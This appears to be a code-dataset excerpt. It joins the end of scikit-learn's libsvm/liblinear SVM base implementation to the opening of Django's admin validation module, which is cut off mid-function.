self._intercept_ = self.intercept_.copy()
self._dual_coef_ = self.dual_coef_
if self._impl in ['c_svc', 'nu_svc'] and len(self.classes_) == 2:
self.intercept_ *= -1
self.dual_coef_ = -self.dual_coef_
return self
def _validate_targets(self, y):
"""Validation of y and class_weight.
Default implementation for SVR and one-class; overridden in BaseSVC.
"""
# XXX this is ugly.
# Regression models should not have a class_weight_ attribute.
self.class_weight_ = np.empty(0)
return column_or_1d(y, warn=True).astype(np.float64)
def _warn_from_fit_status(self):
assert self.fit_status_ in (0, 1)
if self.fit_status_ == 1:
warnings.warn('Solver terminated early (max_iter=%i).'
' Consider pre-processing your data with'
' StandardScaler or MinMaxScaler.'
% self.max_iter, ConvergenceWarning)
def _dense_fit(self, X, y, sample_weight, solver_type, kernel,
random_seed):
if callable(self.kernel):
# you must store a reference to X to compute the kernel in predict
# TODO: add keyword copy to copy on demand
self.__Xfit = X
X = self._compute_kernel(X)
if X.shape[0] != X.shape[1]:
raise ValueError("X.shape[0] should be equal to X.shape[1]")
libsvm.set_verbosity_wrap(self.verbose)
# we don't pass **self.get_params() to allow subclasses to
# add other parameters to __init__
self.support_, self.support_vectors_, self.n_support_, \
self.dual_coef_, self.intercept_, self.probA_, \
self.probB_, self.fit_status_ = libsvm.fit(
X, y,
svm_type=solver_type, sample_weight=sample_weight,
class_weight=self.class_weight_, kernel=kernel, C=self.C,
nu=self.nu, probability=self.probability, degree=self.degree,
shrinking=self.shrinking, tol=self.tol,
cache_size=self.cache_size, coef0=self.coef0,
gamma=self._gamma, epsilon=self.epsilon,
max_iter=self.max_iter, random_seed=random_seed)
self._warn_from_fit_status()
def _sparse_fit(self, X, y, sample_weight, solver_type, kernel,
random_seed):
X.data = np.asarray(X.data, dtype=np.float64, order='C')
X.sort_indices()
kernel_type = self._sparse_kernels.index(kernel)
libsvm_sparse.set_verbosity_wrap(self.verbose)
self.support_, self.support_vectors_, dual_coef_data, \
self.intercept_, self.n_support_, \
self.probA_, self.probB_, self.fit_status_ = \
libsvm_sparse.libsvm_sparse_train(
X.shape[1], X.data, X.indices, X.indptr, y, solver_type,
kernel_type, self.degree, self._gamma, self.coef0, self.tol,
self.C, self.class_weight_,
sample_weight, self.nu, self.cache_size, self.epsilon,
int(self.shrinking), int(self.probability), self.max_iter,
random_seed)
self._warn_from_fit_status()
if hasattr(self, "classes_"):
n_class = len(self.classes_) - 1
else: # regression
n_class = 1
n_SV = self.support_vectors_.shape[0]
dual_coef_indices = np.tile(np.arange(n_SV), n_class)
dual_coef_indptr = np.arange(0, dual_coef_indices.size + 1,
dual_coef_indices.size / n_class)
self.dual_coef_ = sp.csr_matrix(
(dual_coef_data, dual_coef_indices, dual_coef_indptr),
(n_class, n_SV))
def predict(self, X):
"""Perform regression on samples in X.
For an one-class model, +1 or -1 is returned.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
For kernel="precomputed", the expected shape of X is
(n_samples_test, n_samples_train).
Returns
-------
y_pred : array, shape (n_samples,)
"""
X = self._validate_for_predict(X)
predict = self._sparse_predict if self._sparse else self._dense_predict
return predict(X)
def _dense_predict(self, X):
n_samples, n_features = X.shape
X = self._compute_kernel(X)
if X.ndim == 1:
X = check_array(X, order='C')
kernel = self.kernel
if callable(self.kernel):
kernel = 'precomputed'
if X.shape[1] != self.shape_fit_[0]:
raise ValueError("X.shape[1] = %d should be equal to %d, "
"the number of samples at training time" %
(X.shape[1], self.shape_fit_[0]))
svm_type = LIBSVM_IMPL.index(self._impl)
return libsvm.predict(
X, self.support_, self.support_vectors_, self.n_support_,
self._dual_coef_, self._intercept_,
self.probA_, self.probB_, svm_type=svm_type, kernel=kernel,
degree=self.degree, coef0=self.coef0, gamma=self._gamma,
cache_size=self.cache_size)
def _sparse_predict(self, X):
# Precondition: X is a csr_matrix of dtype np.float64.
kernel = self.kernel
if callable(kernel):
kernel = 'precomputed'
kernel_type = self._sparse_kernels.index(kernel)
C = 0.0 # C is not useful here
return libsvm_sparse.libsvm_sparse_predict(
X.data, X.indices, X.indptr,
self.support_vectors_.data,
self.support_vectors_.indices,
self.support_vectors_.indptr,
self._dual_coef_.data, self._intercept_,
LIBSVM_IMPL.index(self._impl), kernel_type,
self.degree, self._gamma, self.coef0, self.tol,
C, self.class_weight_,
self.nu, self.epsilon, self.shrinking,
self.probability, self.n_support_,
self.probA_, self.probB_)
def _compute_kernel(self, X):
"""Return the data transformed by a callable kernel"""
if callable(self.kernel):
# in the case of precomputed kernel given as a function, we
# have to compute explicitly the kernel matrix
kernel = self.kernel(X, self.__Xfit)
if sp.issparse(kernel):
kernel = kernel.toarray()
X = np.asarray(kernel, dtype=np.float64, order='C')
return X
@deprecated(" and will be removed in 0.19")
def decision_function(self, X):
"""Distance of the samples X to the separating hyperplane.
Parameters
----------
X : array-like, shape (n_samples, n_features)
For kernel="precomputed", the expected shape of X is
[n_samples_test, n_samples_train].
Returns
-------
X : array-like, shape (n_samples, n_class * (n_class-1) / 2)
Returns the decision function of the sample for each class
in the model.
"""
return self._decision_function(X)
def _decision_function(self, X):
"""Distance of the samples X to the separating hyperplane.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Returns
-------
X : array-like, shape (n_samples, n_class * (n_class-1) / 2)
Returns the decision function of the sample for each class
in the model.
"""
# NOTE: _validate_for_predict contains check for is_fitted
# hence must be placed before any other attributes are used.
X = self._validate_for_predict(X)
X = self._compute_kernel(X)
if self._sparse:
dec_func = self._sparse_decision_function(X)
else:
dec_func = self._dense_decision_function(X)
# In binary case, we need to flip the sign of coef, intercept and
# decision function.
if self._impl in ['c_svc', 'nu_svc'] and len(self.classes_) == 2:
return -dec_func.ravel()
return dec_func
def _dense_decision_function(self, X):
X = check_array(X, dtype=np.float64, order="C")
kernel = self.kernel
if callable(kernel):
kernel = 'precomputed'
return libsvm.decision_function(
X, self.support_, self.support_vectors_, self.n_support_,
self._dual_coef_, self._intercept_,
self.probA_, self.probB_,
svm_type=LIBSVM_IMPL.index(self._impl),
kernel=kernel, degree=self.degree, cache_size=self.cache_size,
coef0=self.coef0, gamma=self._gamma)
def _sparse_decision_function(self, X):
X.data = np.asarray(X.data, dtype=np.float64, order='C')
kernel = self.kernel
if hasattr(kernel, '__call__'):
kernel = 'precomputed'
kernel_type = self._sparse_kernels.index(kernel)
return libsvm_sparse.libsvm_sparse_decision_function(
X.data, X.indices, X.indptr,
self.support_vectors_.data,
self.support_vectors_.indices,
self.support_vectors_.indptr,
self._dual_coef_.data, self._intercept_,
LIBSVM_IMPL.index(self._impl), kernel_type,
self.degree, self._gamma, self.coef0, self.tol,
self.C, self.class_weight_,
self.nu, self.epsilon, self.shrinking,
self.probability, self.n_support_,
self.probA_, self.probB_)
def _validate_for_predict(self, X):
check_is_fitted(self, 'support_')
X = check_array(X, accept_sparse='csr', dtype=np.float64, order="C")
if self._sparse and not sp.isspmatrix(X):
X = sp.csr_matrix(X)
if self._sparse:
X.sort_indices()
if sp.issparse(X) and not self._sparse and not callable(self.kernel):
raise ValueError(
"cannot use sparse input in %r trained on dense data"
% type(self).__name__)
n_samples, n_features = X.shape
if self.kernel == "precomputed":
if X.shape[1] != self.shape_fit_[0]:
raise ValueError("X.shape[1] = %d should be equal to %d, "
"the number of samples at training time" %
(X.shape[1], self.shape_fit_[0]))
elif n_features != self.shape_fit_[1]:
raise ValueError("X.shape[1] = %d should be equal to %d, "
"the number of features at training time" %
(n_features, self.shape_fit_[1]))
return X
@property
def coef_(self):
if self.kernel != 'linear':
raise ValueError('coef_ is only available when using a '
'linear kernel')
coef = self._get_coef()
# coef_ being a read-only property, it's better to mark the value as
# immutable to avoid hiding potential bugs for the unsuspecting user.
if sp.issparse(coef):
# sparse matrix do not have global flags
coef.data.flags.writeable = False
else:
# regular dense array
coef.flags.writeable = False
return coef
def _get_coef(self):
return safe_sparse_dot(self._dual_coef_, self.support_vectors_)
class BaseSVC(six.with_metaclass(ABCMeta, BaseLibSVM, ClassifierMixin)):
"""ABC for LibSVM-based classifiers."""
@abstractmethod
def __init__(self, impl, kernel, degree, gamma, coef0, tol, C, nu,
shrinking, probability, cache_size, class_weight, verbose,
max_iter, decision_function_shape, random_state):
self.decision_function_shape = decision_function_shape
super(BaseSVC, self).__init__(
impl=impl, kernel=kernel, degree=degree, gamma=gamma, coef0=coef0,
tol=tol, C=C, nu=nu, epsilon=0., shrinking=shrinking,
probability=probability, cache_size=cache_size,
class_weight=class_weight, verbose=verbose, max_iter=max_iter,
random_state=random_state)
def _validate_targets(self, y):
y_ = column_or_1d(y, warn=True)
cls, y = np.unique(y_, return_inverse=True)
self.class_weight_ = compute_class_weight(self.class_weight, cls, y_)
if len(cls) < 2:
raise ValueError(
"The number of classes has to be greater than one; got %d"
% len(cls))
self.classes_ = cls
return np.asarray(y, dtype=np.float64, order='C')
def decision_function(self, X):
"""Distance of the samples X to the separating hyperplane.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Returns
-------
X : array-like, shape (n_samples, n_classes * (n_classes-1) / 2)
Returns the decision function of the sample for each class
in the model.
If decision_function_shape='ovr', the shape is (n_samples,
n_classes)
"""
dec = self._decision_function(X)
if self.decision_function_shape is None and len(self.classes_) > 2:
warnings.warn("The decision_function_shape default value will "
"change from 'ovo' to 'ovr' in 0.18. This will change "
"the shape of the decision function returned by "
"SVC.", ChangedBehaviorWarning)
if self.decision_function_shape == 'ovr':
return _ovr_decision_function(dec < 0, dec, len(self.classes_))
return dec
def predict(self, X):
"""Perform classification on samples in X.
For an one-class model, +1 or -1 is returned.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
For kernel="precomputed", the expected shape of X is
[n_samples_test, n_samples_train]
Returns
-------
y_pred : array, shape (n_samples,)
Class labels for samples in X.
"""
y = super(BaseSVC, self).predict(X)
return self.classes_.take(np.asarray(y, dtype=np.intp))
# Hacky way of getting predict_proba to raise an AttributeError when
# probability=False using properties. Do not use this in new code; when
# probabilities are not available depending on a setting, introduce two
# estimators.
def _check_proba(self):
if not self.probability:
raise AttributeError("predict_proba is not available when "
" probability=False")
if self._impl not in ('c_svc', 'nu_svc'):
raise AttributeError("predict_proba only implemented for SVC"
" and NuSVC")
@property
def predict_proba(self):
"""Compute probabilities of possible outcomes for samples in X.
The model need to have probability information computed at training
time: fit with attribute `probability` set to True.
Parameters
----------
X : array-like, shape (n_samples, n_features)
For kernel="precomputed", the expected shape of X is
[n_samples_test, n_samples_train]
Returns
-------
T : array-like, shape (n_samples, n_classes)
Returns the probability of the sample for each class in
the model. The columns correspond to the classes in sorted
order, as they appear in the attribute `classes_`.
Notes
-----
The probability model is created using cross validation, so
the results can be slightly different than those obtained by
predict. Also, it will produce meaningless results on very small
datasets.
"""
self._check_proba()
return self._predict_proba
def _predict_proba(self, X):
X = self._validate_for_predict(X)
if self.probA_.size == 0 or self.probB_.size == 0:
raise NotFittedError("predict_proba is not available when fitted "
"with probability=False")
pred_proba = (self._sparse_predict_proba
if self._sparse else self._dense_predict_proba)
return pred_proba(X)
@property
def predict_log_proba(self):
"""Compute log probabilities of possible outcomes for samples in X.
The model need to have probability information computed at training
time: fit with attribute `probability` set to True.
Parameters
----------
X : array-like, shape (n_samples, n_features)
For kernel="precomputed", the expected shape of X is
[n_samples_test, n_samples_train]
Returns
-------
T : array-like, shape (n_samples, n_classes)
Returns the log-probabilities of the sample for each class in
the model. The columns correspond to the classes in sorted
order, as they appear in the attribute `classes_`.
Notes
-----
The probability model is created using cross validation, so
the results can be slightly different than those obtained by
predict. Also, it will produce meaningless results on very small
datasets.
"""
self._check_proba()
return self._predict_log_proba
def _predict_log_proba(self, X):
return np.log(self.predict_proba(X))
def _dense_predict_proba(self, X):
X = self._compute_kernel(X)
kernel = self.kernel
if callable(kernel):
kernel = 'precomputed'
svm_type = LIBSVM_IMPL.index(self._impl)
pprob = libsvm.predict_proba(
X, self.support_, self.support_vectors_, self.n_support_,
self._dual_coef_, self._intercept_,
self.probA_, self.probB_,
svm_type=svm_type, kernel=kernel, degree=self.degree,
cache_size=self.cache_size, coef0=self.coef0, gamma=self._gamma)
return pprob
def _sparse_predict_proba(self, X):
X.data = np.asarray(X.data, dtype=np.float64, order='C')
kernel = self.kernel
if callable(kernel):
kernel = 'precomputed'
kernel_type = self._sparse_kernels.index(kernel)
return libsvm_sparse.libsvm_sparse_predict_proba(
X.data, X.indices, X.indptr,
self.support_vectors_.data,
self.support_vectors_.indices,
self.support_vectors_.indptr,
self._dual_coef_.data, self._intercept_,
LIBSVM_IMPL.index(self._impl), kernel_type,
self.degree, self._gamma, self.coef0, self.tol,
self.C, self.class_weight_,
self.nu, self.epsilon, self.shrinking,
self.probability, self.n_support_,
self.probA_, self.probB_)
def _get_coef(self):
if self.dual_coef_.shape[0] == 1:
# binary classifier
coef = safe_sparse_dot(self.dual_coef_, self.support_vectors_)
else:
# 1vs1 classifier
coef = _one_vs_one_coef(self.dual_coef_, self.n_support_,
self.support_vectors_)
if sp.issparse(coef[0]):
coef = sp.vstack(coef).tocsr()
else:
coef = np.vstack(coef)
return coef
def _get_liblinear_solver_type(multi_class, penalty, loss, dual):
"""Find the liblinear magic number for the solver.
This number depends on the values of the following attributes:
- multi_class
- penalty
- loss
- dual
The same number is also internally used by LibLinear to determine
which solver to use.
"""
# nested dicts containing level 1: available loss functions,
# level2: available penalties for the given loss functin,
# level3: wether the dual solver is available for the specified
# combination of loss function and penalty
_solver_type_dict = {
'logistic_regression': {
'l1': {False: 6},
'l2': {False: 0, True: 7}},
'hinge': {
'l2': {True: 3}},
'squared_hinge': {
'l1': {False: 5},
'l2': {False: 2, True: 1}},
'epsilon_insensitive': {
'l2': {True: 13}},
'squared_epsilon_insensitive': {
'l2': {False: 11, True: 12}},
'crammer_singer': 4
}
if multi_class == 'crammer_singer':
return _solver_type_dict[multi_class]
elif multi_class != 'ovr':
raise ValueError("`multi_class` must be one of `ovr`, "
"`crammer_singer`, got %r" % multi_class)
# FIXME loss.lower() --> loss in 0.18
_solver_pen = _solver_type_dict.get(loss.lower(), None)
if _solver_pen is None:
error_string = ("loss='%s' is not supported" % loss)
else:
# FIME penalty.lower() --> penalty in 0.18
_solver_dual = _solver_pen.get(penalty.lower(), None)
if _solver_dual is None:
error_string = ("The combination of penalty='%s' "
"and loss='%s' is not supported"
% (penalty, loss))
else:
solver_num = _solver_dual.get(dual, None)
if solver_num is None:
error_string = ("The combination of penalty='%s' and "
"loss='%s' are not supported when dual=%s"
% (penalty, loss, dual))
else:
return solver_num
raise ValueError('Unsupported set of arguments: %s, '
'Parameters: penalty=%r, loss=%r, dual=%r'
% (error_string, penalty, loss, dual))
def _fit_liblinear(X, y, C, fit_intercept, intercept_scaling, class_weight,
penalty, dual, verbose, max_iter, tol,
random_state=None, multi_class='ovr',
loss='logistic_regression', epsilon=0.1):
"""Used by Logistic Regression (and CV) and LinearSVC.
Preprocessing is done in this function before supplying it to liblinear.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples,)
Target vector relative to X
C : float
Inverse of cross-validation parameter. Lower the C, the more
the penalization.
fit_intercept : bool
Whether or not to fit the intercept, that is to add a intercept
term to the decision function.
intercept_scaling : float
LibLinear internally penalizes the intercept and this term is subject
to regularization just like the other terms of the feature vector.
In order to avoid this, one should increase the intercept_scaling.
such that the feature vector becomes [x, intercept_scaling].
class_weight : {dict, 'balanced'}, optional
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one. For
multi-output problems, a list of dicts can be provided in the same
order as the columns of y.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
penalty : str, {'l1', 'l2'}
The norm of the penalty used in regularization.
dual : bool
Dual or primal formulation,
verbose : int
Set verbose to any positive number for verbosity.
max_iter : int
Number of iterations.
tol : float
Stopping condition.
random_state : int seed, RandomState instance, or None (default)
The seed of the pseudo random number generator to use when
shuffling the data.
multi_class : str, {'ovr', 'crammer_singer'}
`ovr` trains n_classes one-vs-rest classifiers, while `crammer_singer`
optimizes a joint objective over all classes.
While `crammer_singer` is interesting from an theoretical perspective
as it is consistent it is seldom used in practice and rarely leads to
better accuracy and is more expensive to compute.
If `crammer_singer` is chosen, the options loss, penalty and dual will
be ignored.
loss : str, {'logistic_regression', 'hinge', 'squared_hinge',
'epsilon_insensitive', 'squared_epsilon_insensitive}
The loss function used to fit the model.
epsilon : float, optional (default=0.1)
Epsilon parameter in the epsilon-insensitive loss function. Note
that the value of this parameter depends on the scale of the target
variable y. If unsure, set epsilon=0.
Returns
-------
coef_ : ndarray, shape (n_features, n_features + 1)
The coefficent vector got by minimizing the objective function.
intercept_ : float
The intercept term added to the vector.
n_iter_ : int
Maximum number of iterations run across all classes.
"""
# FIXME Remove case insensitivity in 0.18 ---------------------
loss_l, penalty_l = loss.lower(), penalty.lower()
msg = ("loss='%s' has been deprecated in favor of "
"loss='%s' as of 0.16. Backward compatibility"
" for the uppercase notation will be removed in %s")
if (not loss.islower()) and loss_l not in ('l1', 'l2'):
warnings.warn(msg % (loss, loss_l, "0.18"),
DeprecationWarning)
if not penalty.islower():
warnings.warn(msg.replace("loss", "penalty")
% (penalty, penalty_l, "0.18"),
DeprecationWarning)
# -------------------------------------------------------------
# FIXME loss_l --> loss in 0.18
if loss_l not in ['epsilon_insensitive', 'squared_epsilon_insensitive']:
enc = LabelEncoder()
y_ind = enc.fit_transform(y)
classes_ = enc.classes_
if len(classes_) < 2:
raise ValueError("This solver needs samples of at least 2 classes"
" in the data, but the data contains only one"
" class: %r" % classes_[0])
class_weight_ = compute_class_weight(class_weight, classes_, y)
else:
class_weight_ = np.empty(0, dtype=np.float)
y_ind = y
liblinear.set_verbosity_wrap(verbose)
rnd = check_random_state(random_state)
if verbose:
print('[LibLinear]', end='')
# LinearSVC breaks when intercept_scaling is <= 0
bias = -1.0
if fit_intercept:
if intercept_scaling <= 0:
raise ValueError("Intercept scaling is %r but needs to be greater than 0."
" To disable fitting an intercept,"
" set fit_intercept=False." % intercept_scaling)
else:
bias = intercept_scaling
libsvm.set_verbosity_wrap(verbose)
libsvm_sparse.set_verbosity_wrap(verbose)
liblinear.set_verbosity_wrap(verbose)
# LibLinear wants targets as doubles, even for classification
y_ind = np.asarray(y_ind, dtype=np.float64).ravel()
solver_type = _get_liblinear_solver_type(multi_class, penalty, loss, dual)
raw_coef_, n_iter_ = liblinear.train_wrap(
X, y_ind, sp.isspmatrix(X), solver_type, tol, bias, C,
class_weight_, max_iter, rnd.randint(np.iinfo('i').max),
epsilon)
# Regarding rnd.randint(..) in the above signature:
# seed for srand in range [0..INT_MAX); due to limitations in Numpy
# on 32-bit platforms, we can't get to the UINT_MAX limit that
# srand supports
n_iter_ = max(n_iter_)
if n_iter_ >= max_iter and verbose > 0:
warnings.warn("Liblinear failed to converge, increase "
"the number of iterations.", ConvergenceWarning)
if fit_intercept:
coef_ = raw_coef_[:, :-1]
intercept_ = intercept_scaling * raw_coef_[:, -1]
else:
coef_ = raw_coef_
intercept_ = 0.
return coef_, intercept_, n_iter_
| bsd-3-clause |
rogerhu/django | django/contrib/admin/validation.py | 3 | 23723 | from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.db.models.fields import FieldDoesNotExist
from django.forms.models import BaseModelForm, BaseModelFormSet, _get_foreign_key
from django.contrib.admin.utils import get_fields_from_path, NotRelationField
"""
Does basic ModelAdmin option validation. Calls custom validation
classmethod in the end if it is provided in cls. The signature of the
custom validation classmethod should be: def validate(cls, model).
"""
__all__ = ['BaseValidator', 'InlineValidator']
class BaseValidator(object):
def __init__(self):
# Before we can introspect models, they need to be fully loaded so that
# inter-relations are set up correctly. We force that here.
models.get_apps()
def validate(self, cls, model):
for m in dir(self):
if m.startswith('validate_'):
getattr(self, m)(cls, model)
def check_field_spec(self, cls, model, flds, label):
"""
Validate the fields specification in `flds` from a ModelAdmin subclass
`cls` for the `model` model. Use `label` for reporting problems to the user.
The fields specification can be a ``fields`` option or a ``fields``
sub-option from a ``fieldsets`` option component.
"""
for fields in flds:
# The entry in fields might be a tuple. If it is a standalone
# field, make it into a tuple to make processing easier.
if type(fields) != tuple:
fields = (fields,)
for field in fields:
if field in cls.readonly_fields:
# Stuff can be put in fields that isn't actually a
# model field if it's in readonly_fields,
# readonly_fields will handle the validation of such
# things.
continue
try:
f = model._meta.get_field(field)
except models.FieldDoesNotExist:
# If we can't find a field on the model that matches, it could be an
# extra field on the form; nothing to check so move on to the next field.
continue
if isinstance(f, models.ManyToManyField) and not f.rel.through._meta.auto_created:
raise ImproperlyConfigured("'%s.%s' "
"can't include the ManyToManyField field '%s' because "
"'%s' manually specifies a 'through' model." % (
cls.__name__, label, field, field))
def validate_raw_id_fields(self, cls, model):
" Validate that raw_id_fields only contains field names that are listed on the model. "
if hasattr(cls, 'raw_id_fields'):
check_isseq(cls, 'raw_id_fields', cls.raw_id_fields)
for idx, field in enumerate(cls.raw_id_fields):
f = get_field(cls, model, 'raw_id_fields', field)
if not isinstance(f, (models.ForeignKey, models.ManyToManyField)):
raise ImproperlyConfigured("'%s.raw_id_fields[%d]', '%s' must "
"be either a ForeignKey or ManyToManyField."
% (cls.__name__, idx, field))
def validate_fields(self, cls, model):
" Validate that fields only refer to existing fields, doesn't contain duplicates. "
# fields
if cls.fields: # default value is None
check_isseq(cls, 'fields', cls.fields)
self.check_field_spec(cls, model, cls.fields, 'fields')
if cls.fieldsets:
raise ImproperlyConfigured('Both fieldsets and fields are specified in %s.' % cls.__name__)
if len(cls.fields) > len(set(cls.fields)):
raise ImproperlyConfigured('There are duplicate field(s) in %s.fields' % cls.__name__)
def validate_fieldsets(self, cls, model):
" Validate that fieldsets is properly formatted and doesn't contain duplicates. "
from django.contrib.admin.options import flatten_fieldsets
if cls.fieldsets: # default value is None
check_isseq(cls, 'fieldsets', cls.fieldsets)
for idx, fieldset in enumerate(cls.fieldsets):
check_isseq(cls, 'fieldsets[%d]' % idx, fieldset)
if len(fieldset) != 2:
raise ImproperlyConfigured("'%s.fieldsets[%d]' does not "
"have exactly two elements." % (cls.__name__, idx))
check_isdict(cls, 'fieldsets[%d][1]' % idx, fieldset[1])
if 'fields' not in fieldset[1]:
raise ImproperlyConfigured("'fields' key is required in "
"%s.fieldsets[%d][1] field options dict."
% (cls.__name__, idx))
self.check_field_spec(cls, model, fieldset[1]['fields'], "fieldsets[%d][1]['fields']" % idx)
flattened_fieldsets = flatten_fieldsets(cls.fieldsets)
if len(flattened_fieldsets) > len(set(flattened_fieldsets)):
raise ImproperlyConfigured('There are duplicate field(s) in %s.fieldsets' % cls.__name__)
def validate_exclude(self, cls, model):
" Validate that exclude is a sequence without duplicates. "
if cls.exclude: # default value is None
check_isseq(cls, 'exclude', cls.exclude)
if len(cls.exclude) > len(set(cls.exclude)):
raise ImproperlyConfigured('There are duplicate field(s) in %s.exclude' % cls.__name__)
def validate_form(self, cls, model):
" Validate that form subclasses BaseModelForm. "
if hasattr(cls, 'form') and not issubclass(cls.form, BaseModelForm):
raise ImproperlyConfigured("%s.form does not inherit from "
"BaseModelForm." % cls.__name__)
def validate_filter_vertical(self, cls, model):
" Validate that filter_vertical is a sequence of field names. "
if hasattr(cls, 'filter_vertical'):
check_isseq(cls, 'filter_vertical', cls.filter_vertical)
for idx, field in enumerate(cls.filter_vertical):
f = get_field(cls, model, 'filter_vertical', field)
if not isinstance(f, models.ManyToManyField):
raise ImproperlyConfigured("'%s.filter_vertical[%d]' must be "
"a ManyToManyField." % (cls.__name__, idx))
def validate_filter_horizontal(self, cls, model):
" Validate that filter_horizontal is a sequence of field names. "
if hasattr(cls, 'filter_horizontal'):
check_isseq(cls, 'filter_horizontal', cls.filter_horizontal)
for idx, field in enumerate(cls.filter_horizontal):
f = get_field(cls, model, 'filter_horizontal', field)
if not isinstance(f, models.ManyToManyField):
raise ImproperlyConfigured("'%s.filter_horizontal[%d]' must be "
"a ManyToManyField." % (cls.__name__, idx))
def validate_radio_fields(self, cls, model):
" Validate that radio_fields is a dictionary of choice or foreign key fields. "
from django.contrib.admin.options import HORIZONTAL, VERTICAL
if hasattr(cls, 'radio_fields'):
check_isdict(cls, 'radio_fields', cls.radio_fields)
for field, val in cls.radio_fields.items():
f = get_field(cls, model, 'radio_fields', field)
if not (isinstance(f, models.ForeignKey) or f.choices):
raise ImproperlyConfigured("'%s.radio_fields['%s']' "
"is neither an instance of ForeignKey nor does "
"have choices set." % (cls.__name__, field))
if not val in (HORIZONTAL, VERTICAL):
raise ImproperlyConfigured("'%s.radio_fields['%s']' "
"is neither admin.HORIZONTAL nor admin.VERTICAL."
% (cls.__name__, field))
def validate_prepopulated_fields(self, cls, model):
" Validate that prepopulated_fields if a dictionary containing allowed field types. "
# prepopulated_fields
if hasattr(cls, 'prepopulated_fields'):
check_isdict(cls, 'prepopulated_fields', cls.prepopulated_fields)
for field, val in cls.prepopulated_fields.items():
f = get_field(cls, model, 'prepopulated_fields', field)
if isinstance(f, (models.DateTimeField, models.ForeignKey,
models.ManyToManyField)):
raise ImproperlyConfigured("'%s.prepopulated_fields['%s']' "
"is either a DateTimeField, ForeignKey or "
"ManyToManyField. This isn't allowed."
% (cls.__name__, field))
check_isseq(cls, "prepopulated_fields['%s']" % field, val)
for idx, f in enumerate(val):
get_field(cls, model, "prepopulated_fields['%s'][%d]" % (field, idx), f)
def validate_view_on_site_url(self, cls, model):
if hasattr(cls, 'view_on_site'):
if not callable(cls.view_on_site) and not isinstance(cls.view_on_site, bool):
raise ImproperlyConfigured("%s.view_on_site is not a callable or a boolean value." % cls.__name__)
def validate_ordering(self, cls, model):
" Validate that ordering refers to existing fields or is random. "
# ordering = None
if cls.ordering:
check_isseq(cls, 'ordering', cls.ordering)
for idx, field in enumerate(cls.ordering):
if field == '?' and len(cls.ordering) != 1:
raise ImproperlyConfigured("'%s.ordering' has the random "
"ordering marker '?', but contains other fields as "
"well. Please either remove '?' or the other fields."
% cls.__name__)
if field == '?':
continue
if field.startswith('-'):
field = field[1:]
# Skip ordering in the format field1__field2 (FIXME: checking
# this format would be nice, but it's a little fiddly).
if '__' in field:
continue
get_field(cls, model, 'ordering[%d]' % idx, field)
def validate_readonly_fields(self, cls, model):
" Validate that readonly_fields refers to proper attribute or field. "
if hasattr(cls, "readonly_fields"):
check_isseq(cls, "readonly_fields", cls.readonly_fields)
for idx, field in enumerate(cls.readonly_fields):
if not callable(field):
if not hasattr(cls, field):
if not hasattr(model, field):
try:
model._meta.get_field(field)
except models.FieldDoesNotExist:
raise ImproperlyConfigured("%s.readonly_fields[%d], %r is not a callable or an attribute of %r or found in the model %r."
% (cls.__name__, idx, field, cls.__name__, model._meta.object_name))
class ModelAdminValidator(BaseValidator):
def validate_save_as(self, cls, model):
" Validate save_as is a boolean. "
check_type(cls, 'save_as', bool)
def validate_save_on_top(self, cls, model):
" Validate save_on_top is a boolean. "
check_type(cls, 'save_on_top', bool)
def validate_inlines(self, cls, model):
" Validate inline model admin classes. "
from django.contrib.admin.options import BaseModelAdmin
if hasattr(cls, 'inlines'):
check_isseq(cls, 'inlines', cls.inlines)
for idx, inline in enumerate(cls.inlines):
if not issubclass(inline, BaseModelAdmin):
raise ImproperlyConfigured("'%s.inlines[%d]' does not inherit "
"from BaseModelAdmin." % (cls.__name__, idx))
if not inline.model:
raise ImproperlyConfigured("'model' is a required attribute "
"of '%s.inlines[%d]'." % (cls.__name__, idx))
if not issubclass(inline.model, models.Model):
raise ImproperlyConfigured("'%s.inlines[%d].model' does not "
"inherit from models.Model." % (cls.__name__, idx))
inline.validate(inline.model)
self.check_inline(inline, model)
def check_inline(self, cls, parent_model):
" Validate inline class's fk field is not excluded. "
fk = _get_foreign_key(parent_model, cls.model, fk_name=cls.fk_name, can_fail=True)
if hasattr(cls, 'exclude') and cls.exclude:
if fk and fk.name in cls.exclude:
raise ImproperlyConfigured("%s cannot exclude the field "
"'%s' - this is the foreign key to the parent model "
"%s.%s." % (cls.__name__, fk.name, parent_model._meta.app_label, parent_model.__name__))
def validate_list_display(self, cls, model):
" Validate that list_display only contains fields or usable attributes. "
if hasattr(cls, 'list_display'):
check_isseq(cls, 'list_display', cls.list_display)
for idx, field in enumerate(cls.list_display):
if not callable(field):
if not hasattr(cls, field):
if not hasattr(model, field):
try:
model._meta.get_field(field)
except models.FieldDoesNotExist:
raise ImproperlyConfigured("%s.list_display[%d], %r is not a callable or an attribute of %r or found in the model %r."
% (cls.__name__, idx, field, cls.__name__, model._meta.object_name))
else:
# getattr(model, field) could be an X_RelatedObjectsDescriptor
f = fetch_attr(cls, model, "list_display[%d]" % idx, field)
if isinstance(f, models.ManyToManyField):
raise ImproperlyConfigured("'%s.list_display[%d]', '%s' is a ManyToManyField which is not supported."
% (cls.__name__, idx, field))
def validate_list_display_links(self, cls, model):
" Validate that list_display_links either is None or a unique subset of list_display."
if hasattr(cls, 'list_display_links'):
if cls.list_display_links is None:
return
check_isseq(cls, 'list_display_links', cls.list_display_links)
for idx, field in enumerate(cls.list_display_links):
if field not in cls.list_display:
raise ImproperlyConfigured("'%s.list_display_links[%d]' "
"refers to '%s' which is not defined in 'list_display'."
% (cls.__name__, idx, field))
def validate_list_filter(self, cls, model):
"""
Validate that list_filter is a sequence of one of three options:
1: 'field' - a basic field filter, possibly w/ relationships (eg, 'field__rel')
2: ('field', SomeFieldListFilter) - a field-based list filter class
3: SomeListFilter - a non-field list filter class
"""
from django.contrib.admin import ListFilter, FieldListFilter
if hasattr(cls, 'list_filter'):
check_isseq(cls, 'list_filter', cls.list_filter)
for idx, item in enumerate(cls.list_filter):
if callable(item) and not isinstance(item, models.Field):
